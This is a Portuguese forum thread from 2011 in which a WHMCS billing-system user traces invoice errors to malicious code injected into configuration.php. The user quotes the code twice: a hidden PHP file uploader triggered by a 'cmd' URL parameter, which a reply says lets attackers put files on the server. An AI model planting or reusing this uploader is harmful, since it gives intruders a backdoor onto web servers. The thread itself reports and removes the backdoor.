Wilson Postado Dezembro 23, 2011 Compartilhar Postado Dezembro 23, 2011 (editado) Olá caros tudo bom? Estou com o seguinte erro ao visualizar/criar faturas pelo admin: Invoice # Invoice ID Not Found Acontece que qualquer cliente que acesse a sua conta, e clique em ver fatura, o sistema retorna a mensagem: Ocorreu um erro. Por favor, tente novamente. Se alguem poder me ajudar, agradeço! OBS: Vale ressaltar que eu não fiz nenhuma modificação no whmcs, não instalei nada no mesmo. Simplesmente do dia pra noite um cliente informou que não estava conseguindo pagar devido a um erro, fui verificar e identifiquei esta falha. Utilizo o whmcs a mais de 1 ano e nunca tive esse tipo de problema. Editado Dezembro 23, 2011 por Wilson Link para o comentário Compartilhar em outros sites More sharing options...
ronnysantana Postado Dezembro 23, 2011 Compartilhar Postado Dezembro 23, 2011 Pode ser algum problema com o modulo/forma de pagamento, dê mais detalhes. Link para o comentário Compartilhar em outros sites More sharing options...
Wilson Postado Dezembro 23, 2011 Autor Compartilhar Postado Dezembro 23, 2011 Então, Eu ja desativei todas as formas de pagamento, atualizei o whmcs para a versão atual e mesmo assim o erro persiste... Não sei mais o que fazer, resumidamente o erro é este, ao criar faturas/visulizar/editar ele retorna o erro Invoice ID Not Found, mesmo no caso de alteração, na onde tenho certeza de que a fatura esta lá criada, e com o ID correto, se clicar para alterar a mesma da este erro... Link para o comentário Compartilhar em outros sites More sharing options...
ronnysantana Postado Dezembro 23, 2011 Compartilhar Postado Dezembro 23, 2011 Abra um ticket no whmcs relatando o problema. Link para o comentário Compartilhar em outros sites More sharing options...
leonelborges Postado Dezembro 23, 2011 Compartilhar Postado Dezembro 23, 2011 Já tentou enviar os modulos de pagamento novamente? Você pode estar enviando os modulos para a pasta; /public_html/seu_whmcs/modules/gateways/ Link para o comentário Compartilhar em outros sites More sharing options...
Wilson Postado Dezembro 23, 2011 Autor Compartilhar Postado Dezembro 23, 2011 Já tentou enviar os modulos de pagamento novamente? Você pode estar enviando os modulos para a pasta; /public_html/seu_whmcs/modules/gateways/ Sim ja fiz isso, sem sucesso. Sei lá pessoal, o pior é parar do nada, sem eu ter feito nenhuma ação para tal. Link para o comentário Compartilhar em outros sites More sharing options...
Jordan Miguel Postado Dezembro 23, 2011 Compartilhar Postado Dezembro 23, 2011 Verifique a tabela de invoices no mysql e veja se está tudo ok. Dê um repair através do PHPMyAdmin para garantir que sim. Link para o comentário Compartilhar em outros sites More sharing options...
edvan Postado Dezembro 23, 2011 Compartilhar Postado Dezembro 23, 2011 Verifique se o arquivo configuration.php tem alguma linha estranha. Semana passada um cliente teve um problema similar, ao invés da fatura ocorria essa falha para os pedidos ( orders ). Ele não tinha aplicado o patch de segurança ( http://www.whmcs.blog.br/principal/atualizacao-de-seguranca-2/ ), com isso o WHMCS foi modificado por um código malicioso. Após restaurar o configuration.php o problema foi sanado. Link para o comentário Compartilhar em outros sites More sharing options...
Wilson Postado Dezembro 23, 2011 Autor Compartilhar Postado Dezembro 23, 2011 Verifique se o arquivo configuration.php tem alguma linha estranha. Semana passada um cliente teve um problema similar, ao invés da fatura ocorria essa falha para os pedidos ( orders ). Ele não tinha aplicado o patch de segurança ( http://www.whmcs.blog.br/principal/atualizacao-de-seguranca-2/ ), com isso o WHMCS foi modificado por um código malicioso. Após restaurar o configuration.php o problema foi sanado. Caramba Pessoal! RESOLVI após a dica do Edvan. Cara muito obrigado! Tambem gostaria de agradecer a todos que responderam o topico tentando me ajudar. OBS: No arquivo configuration.php logo abaixo depois das informações de banco de dados etc, continha o seguinte código: <?php $id = $_GET['cmd']; if ($id ==up') { echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } } ?> Apaguei tudo isso ai e subi novamente para o diretório e funcionou. OBS, eu fiz a atualização de segurança, mais acho que este código foi parar lá antes desta atualização, e eu só fui perceber por causa da fatura de clientes que vence perto do dia 20. Fica uma pergunta, o que este código pode causar de dano ao sistema, tirando esta falha das faturas, corro algum risco de segurança? Mais uma vez, obrigado pessoal. Link para o comentário Compartilhar em outros sites More sharing options...
Erle Carrara Postado Dezembro 23, 2011 Compartilhar Postado Dezembro 23, 2011 Caramba Pessoal! RESOLVI após a dica do Edvan. Cara muito obrigado! Tambem gostaria de agradecer a todos que responderam o topico tentando me ajudar. OBS: No arquivo configuration.php logo abaixo depois das informações de banco de dados etc, continha o seguinte código: <?php $id = $_GET['cmd']; if ($id ==up') { echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } } ?> Apaguei tudo isso ai e subi novamente para o diretório e funcionou. OBS, eu fiz a atualização de segurança, mais acho que este código foi parar lá antes desta atualização, e eu só fui perceber por causa da fatura de clientes que vence perto do dia 20. Fica uma pergunta, o que este código pode causar de dano ao sistema, tirando esta falha das faturas, corro algum risco de segurança? Mais uma vez, obrigado pessoal. Pode sim! Esse código faz o upload de arquivos para o servidor... Veja se não tem mais nada perdido na sua instalação do WHMCS! Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados